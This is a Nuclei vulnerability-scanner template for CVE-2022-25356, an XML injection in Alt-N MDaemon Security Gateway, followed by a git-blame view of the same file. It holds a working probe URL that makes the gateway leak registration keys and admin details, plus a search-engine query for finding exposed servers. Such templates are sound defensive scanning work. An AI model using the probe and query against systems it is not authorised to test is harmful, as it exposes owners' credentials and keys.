nuclei-templates/cves/2022/CVE-2022-25356.yaml

id: CVE-2022-25356

info:
  name: Alt-N MDaemon Security Gateway - XML Injection
  author: Akincibor
  severity: medium
  description: |
    In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.
  reference:
    - https://www.swascan.com/security-advisory-alt-n-security-gateway/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25356
    - https://www.altn.com/Products/SecurityGateway-Email-Firewall/
    - https://www.swascan.com/security-blog/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-25356
    cwe-id: CWE-91
  metadata:
    google-query: inurl:"/SecurityGateway.dll"
    verified: "true"
  tags: cve,cve2022,altn,gateway,xml,injection

requests:
  - method: GET
    path:
      - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Exception: Error while [Loading XML"
          - "&lt;RegKey&gt;"
          - "&lt;IsAdmin&gt;"
        condition: and

      - type: status
        status:
          - 200
Create CVE-2022-25356.yaml 2022-10-07 10:49:09 +00:00			`id: CVE-2022-25356`

			`info:`
			`name: Alt-N MDaemon Security Gateway - XML Injection`
			`author: Akincibor`
			`severity: medium`
			`description: \|`
			`In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.`
			`reference:`
Update CVE-2022-25356.yaml 2022-10-07 12:30:07 +00:00			`- https://www.swascan.com/security-advisory-alt-n-security-gateway/`
Create CVE-2022-25356.yaml 2022-10-07 10:49:09 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-25356`
Auto Generated CVE annotations [Fri Oct 7 12:49:38 UTC 2022] :robot: 2022-10-07 12:49:38 +00:00			`- https://www.altn.com/Products/SecurityGateway-Email-Firewall/`
			`- https://www.swascan.com/security-blog/`
Create CVE-2022-25356.yaml 2022-10-07 10:49:09 +00:00			`classification:`
Auto Generated CVE annotations [Fri Oct 7 12:49:38 UTC 2022] :robot: 2022-10-07 12:49:38 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
			`cvss-score: 5.3`
Create CVE-2022-25356.yaml 2022-10-07 10:49:09 +00:00			`cve-id: CVE-2022-25356`
Auto Generated CVE annotations [Fri Oct 7 12:49:38 UTC 2022] :robot: 2022-10-07 12:49:38 +00:00			`cwe-id: CWE-91`
Create CVE-2022-25356.yaml 2022-10-07 10:49:09 +00:00			`metadata:`
changed dork -> query 2023-01-24 10:09:42 +00:00			`google-query: inurl:"/SecurityGateway.dll"`
Auto Generated CVE annotations [Fri Oct 7 12:49:38 UTC 2022] :robot: 2022-10-07 12:49:38 +00:00			`verified: "true"`
Update CVE-2022-25356.yaml 2022-10-07 12:26:06 +00:00			`tags: cve,cve2022,altn,gateway,xml,injection`
Create CVE-2022-25356.yaml 2022-10-07 10:49:09 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "Exception: Error while [Loading XML"`
			`- "<RegKey>"`
			`- "<IsAdmin>"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`